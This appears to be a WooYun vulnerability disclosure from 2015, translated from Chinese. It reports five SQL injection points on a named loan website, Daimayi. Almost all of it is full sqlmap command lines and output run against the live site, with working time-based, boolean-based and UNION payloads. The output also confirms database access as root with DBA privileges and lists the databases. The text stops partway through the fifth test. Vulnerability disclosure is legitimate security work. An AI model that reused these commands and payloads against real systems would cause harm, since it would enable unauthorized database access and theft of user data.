
Vulnerability summary

Defect ID: wooyun-2015-0152525

Title: Multiple time-based SQL injection vulnerabilities on the Daimayi (贷蚂蚁) main site (DBA privileges)

Vendor: daimayi.com

Author: 路人甲

Submitted: 2015-11-09 00:05

Fix time: 2015-11-21 20:58

Disclosed: 2015-11-21 20:58

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has been notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-09: Details reported to the vendor, awaiting vendor handling
2015-11-21: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

I searched for a long time and tested for a whole night (I can't test during the day, so I continued at night). I searched, and these don't seem to have been submitted before! Multiple parameters have injection points! With this many, surely this counts as a major vendor?

Detailed description:

Injection point 1
URL:

sqlmap.py -u "http://daimayi.com/index.php/Loan/index/it_id/2*" --threads 10 --dbms "MySQL"


The number after it_id is injectable.
sqlmap test:

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[22:20:35] [INFO] testing connection to the target URL
[22:20:40] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[22:20:46] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[22:20:48] [INFO] testing if URI parameter '#1*' is dynamic
[22:20:56] [WARNING] URI parameter '#1*' does not appear dynamic
[22:21:01] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[22:21:01] [INFO] testing for SQL injection on URI parameter '#1*'
[22:21:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:21:05] [WARNING] reflective value(s) found and filtering out
[22:21:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[22:22:32] [INFO] testing 'MySQL inline queries'
[22:22:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:22:37] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:22:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:23:49] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[22:23:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:23:49] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[22:24:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:24:47] [INFO] checking if the injection point on URI parameter '#1*' is a fa
lse positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 83 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/2 AND SLEEP(5)
---
[22:26:53] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


Re-testing with --level 5 --risk 3 added:

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[16:14:21] [INFO] testing connection to the target URL
[16:14:25] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[16:14:30] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[16:14:32] [INFO] testing if URI parameter '#1*' is dynamic
[16:14:36] [WARNING] URI parameter '#1*' does not appear dynamic
[16:14:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[16:14:37] [INFO] testing for SQL injection on URI parameter '#1*'
[16:14:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:14:39] [WARNING] reflective value(s) found and filtering out
[16:17:32] [INFO] heuristics detected web page charset 'ascii'
[16:18:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[16:20:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[16:23:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[16:23:50] [INFO] URI parameter '#1*' seems to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[16:23:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[16:23:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[16:23:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[16:23:57] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[16:24:01] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[16:24:06] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[16:24:08] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[16:24:09] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[16:24:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[16:24:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:24:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[16:24:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[16:24:14] [INFO] testing 'MySQL inline queries'
[16:24:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:24:14] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:24:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:24:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:24:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[16:24:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[16:24:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - co
mment)'
[16:24:31] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[16:25:31] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 OR time-based
blind' injectable
[16:25:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:25:31] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[16:25:59] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[16:26:26] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[16:26:50] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[16:27:14] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[16:27:38] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[16:28:02] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[16:28:27] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[16:28:51] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[16:29:15] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[16:29:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:30:07] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns
'
[16:30:33] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[16:30:57] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column
s'
[16:31:21] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[16:31:46] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column
s'
[16:32:12] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[16:32:36] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column
s'
[16:33:00] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[16:33:25] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum
ns'
[16:33:50] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 789 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-2701) OR (6372=63
72) AND (5532=5532
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-1877) OR 7209=SLE
EP(5) AND (7083=7083
---
[16:37:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


sqlmap.py -u "http://daimayi.com/index.php/Loan/index/it_id/2*" --threads 1 --dbms "MySQL" --level 5 --risk 3 --time-sec 10 --current-user --current-db --is-dba

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[16:40:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-2701) OR (6372=63
72) AND (5532=5532
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://daimayi.com:80/index.php/Loan/index/it_id/-1877) OR 7209=SLE
EP(10) AND (7083=7083
---
[16:40:21] [INFO] testing MySQL
[16:40:25] [WARNING] reflective value(s) found and filtering out
[16:40:29] [INFO] confirming MySQL
[16:40:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:40:41] [INFO] fetching current user
[16:40:41] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:40:41] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[16:48:27] [INFO] fetching current database
[16:48:27] [INFO] retrieved: huomayi
current database: 'huomayi'
[16:52:35] [INFO] testing if current user is DBA
[16:52:35] [INFO] fetching current user
current user is DBA: True


available databases [8]:
[*] daimayi
[*] huomayi
[*] information_schema
[*] mayishequ
[*] mysql
[*] myxd
[*] performance_schema
[*] test

Injection point 2:
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/rm_id/2*" --threads 1 --dbms "MySQL" --level 5 --risk 3 --time-sec 10 --current-user --current-db --is-dba

[*] starting at 20:28:18
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[20:28:19] [INFO] testing connection to the target URL
[20:28:24] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[20:28:29] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[20:28:31] [INFO] testing if URI parameter '#1*' is dynamic
[20:28:36] [WARNING] URI parameter '#1*' does not appear dynamic
[20:28:37] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[20:28:37] [INFO] testing for SQL injection on URI parameter '#1*'
[20:28:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:28:38] [WARNING] reflective value(s) found and filtering out
[20:31:08] [INFO] heuristics detected web page charset 'ascii'
[20:31:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[20:34:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[20:37:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[20:37:43] [INFO] URI parameter '#1*' seems to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[20:37:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[20:37:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[20:37:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[20:37:50] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[20:37:54] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[20:37:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[20:38:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[20:38:02] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[20:38:06] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[20:38:07] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:38:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[20:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[20:38:14] [INFO] testing 'MySQL inline queries'
[20:38:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:38:19] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:38:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:38:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[20:38:27] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:38:49] [INFO] URI parameter '#1*' seems to be 'MySQL < 5.0.12 AND time-based
blind (heavy query)' injectable
[20:38:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:38:49] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[20:39:17] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:39:46] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[20:40:12] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[20:40:37] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[20:41:01] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[20:41:29] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[20:41:54] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[20:42:18] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[20:42:43] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[20:43:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:43:34] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns
'
[20:44:01] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[20:44:25] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column
s'
[20:44:49] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[20:45:15] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column
s'
[20:45:40] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[20:46:04] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column
s'
[20:46:29] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[20:46:54] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum
ns'
[20:47:18] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 797 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Loan/index/rm_id/-6319 OR (8722=872
2)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: http://daimayi.com:80/index.php/Loan/index/rm_id/2 AND 8936=BENCHMA
RK(10000000,MD5(0x6c66665a))
---
[20:47:22] [INFO] testing MySQL
[20:47:28] [INFO] confirming MySQL
[20:47:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[20:47:39] [INFO] fetching current user
[20:47:39] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:47:39] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[20:57:00] [INFO] fetching current database
[20:57:00] [INFO] retrieved: huomayi
current database: 'huomayi'
[21:01:41] [INFO] testing if current user is DBA
[21:01:41] [INFO] fetching current user
current user is DBA: True

Injection point 3:
sqlmap.py -u "http://daimayi.com/index.php/Public/exchange_city/code/120200*" --threads 1 --dbms "MySQL" --level 5 --risk 3 --time-sec 10

[*] starting at 01:07:03
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[01:07:05] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://daimayi.com:80/index.php/Index/index'. Do y
ou want to follow? [Y/n]
[01:07:13] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[01:07:20] [WARNING] URI parameter '#1*' does not appear dynamic
[01:07:26] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[01:07:26] [INFO] testing for SQL injection on URI parameter '#1*'
[01:07:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:16:34] [INFO] heuristics detected web page charset 'ascii'
[01:21:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[01:35:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[01:50:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[01:57:54] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[02:04:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene
ric comment)'
[02:10:12] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[02:26:03] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig
inal value)'
[02:26:03] [WARNING] reflective value(s) found and filtering out
[02:26:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[02:26:24] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[02:26:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[02:27:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[02:27:24] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[02:27:41] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses'
[02:27:42] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses (original value)'
[02:27:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[02:28:20] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[02:28:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:32:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[02:37:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[02:41:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[02:45:40] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[02:48:37] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[02:52:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[02:57:27] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[03:00:17] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[03:02:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[03:02:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[03:03:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[03:03:09] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau
ses'
[03:03:19] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau
ses (EXTRACTVALUE)'
[03:03:33] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau
ses (UPDATEXML)'
[03:03:45] [INFO] testing 'MySQL inline queries'
[03:03:51] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:03:51] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[03:08:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:12:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:14:07] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[03:14:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:14:07] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:16:41] [INFO] target URL appears to be UNION injectable with 6 columns
[03:17:26] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 col
umns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 1254 HTTP(s) re
quests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://daimayi.com:80/index.php/Public/exchange_city/code/-1362') U
NION ALL SELECT NULL,NULL,CONCAT(0x716f7a6971,0x63557866796e487a6c4b,0x717472707
1),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Public/exchange_city/code/120200')
AND SLEEP(10) AND ('huGr'='huGr
---
[03:26:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


But nothing could be retrieved here, so I had to give up on this one!

Injection point 4:
http://daimayi.com/index.php/Register/examimgUserName?user_name=test
user_name is injectable.

[*] starting at 03:33:26
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[03:33:28] [INFO] testing connection to the target URL
[03:33:29] [INFO] heuristics detected web page charset 'ascii'
[03:33:29] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[03:33:31] [INFO] target URL is stable
[03:33:31] [INFO] testing if URI parameter '#1*' is dynamic
[03:33:32] [INFO] confirming that URI parameter '#1*' is dynamic
[03:33:33] [WARNING] URI parameter '#1*' does not appear dynamic
[03:33:35] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[03:33:35] [INFO] testing for SQL injection on URI parameter '#1*'
[03:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:58] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[03:33:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[03:33:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[03:34:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[03:34:01] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[03:34:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[03:34:05] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[03:34:06] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[03:34:08] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[03:34:09] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[03:34:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[03:34:10] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[03:34:10] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[03:34:10] [INFO] testing 'MySQL inline queries'
[03:34:10] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:34:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:34:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:34:35] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[03:34:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:34:35] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:34:37] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[03:34:48] [INFO] target URL appears to have 46 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[03:38:58] [INFO] testing 'MySQL UNION query (36) - 22 to 40 columns'
[03:39:21] [INFO] testing 'MySQL UNION query (36) - 42 to 60 columns'
[03:39:44] [INFO] target URL appears to be UNION injectable with 46 columns
[03:41:37] [INFO] testing 'MySQL UNION query (36) - 62 to 80 columns'
[03:42:00] [INFO] testing 'MySQL UNION query (36) - 82 to 100 columns'
[03:42:24] [INFO] testing 'Generic UNION query (36) - 1 to 20 columns'
[03:44:16] [INFO] testing 'Generic UNION query (36) - 22 to 40 columns'
[03:44:39] [INFO] testing 'Generic UNION query (36) - 42 to 60 columns'
[03:46:56] [INFO] testing 'Generic UNION query (36) - 62 to 80 columns'
[03:47:19] [INFO] testing 'Generic UNION query (36) - 82 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 656 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Register/examimgUserName?user_name=
test') AND 6888=6888 AND ('qZvD'='qZvD
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://daimayi.com:80/index.php/Register/examimgUserName?user_name=
test') AND SLEEP(10) AND ('TnMk'='TnMk
---
[03:50:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.11

Injection point 5:
sqlmap.py -u "http://daimayi.com/index.php/Find_pwd/check_user_name?user_name=test*" --threads 10 --dbms "MySQL" --level 5 --risk 3 --time-sec 10
Again, user_name is injectable.

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[04:12:55] [INFO] testing connection to the target URL
[04:12:56] [INFO] heuristics detected web page charset 'ascii'
[04:12:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[04:12:58] [INFO] target URL is stable
[04:12:58] [INFO] testing if URI parameter '#1*' is dynamic
[04:12:59] [INFO] confirming that URI parameter '#1*' is dynamic
[04:13:01] [WARNING] URI parameter '#1*' does not appear dynamic
[04:13:02] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[04:13:02] [INFO] testing for SQL injection on URI parameter '#1*'
[04:13:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:13:25] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[04:13:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[04:13:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[04:13:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause
(UPDATEXML)'
[04:13:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[04:13:30] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[04:13:32] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(EXTRACTVALUE)'
[04:13:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause
(UPDATEXML)'
[04:13:35] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[04:13:36] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[04:13:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:13:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[04:13:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[04:13:37] [INFO] testing 'MySQL inline queries'
[04:13:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:13:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:13:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:14:02] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[04:14:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[04:14:02] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[04:14:04] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[04:14:15] [INFO] target URL appears to have 46 columns in query
